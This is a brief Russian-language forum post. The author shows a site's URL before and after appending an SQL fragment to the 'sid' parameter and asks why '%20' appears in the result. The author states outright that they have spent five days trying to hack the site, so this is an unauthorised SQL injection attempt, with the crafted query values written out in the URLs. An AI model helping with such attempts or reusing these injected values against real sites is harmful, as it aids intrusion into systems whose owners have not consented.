1)Вот ссылка до изменения http://site.ru/index.php?f=stat&sid=2

2)вот ссылка в именении http://site.ru/index.php?f=stat&sid=2FROM news WHERE id='774'

3)Вот ссылка после изменения : http://site.ru/index.php?f=stat&sid=2FROM%20news%20WHERE%20id='774'

__________________________________________________ ___

Вот и обьсни мне пожалуйста,откуда тут взялись %20 ?? я уже 5-тые сутки не могу взломать этот сайт ;D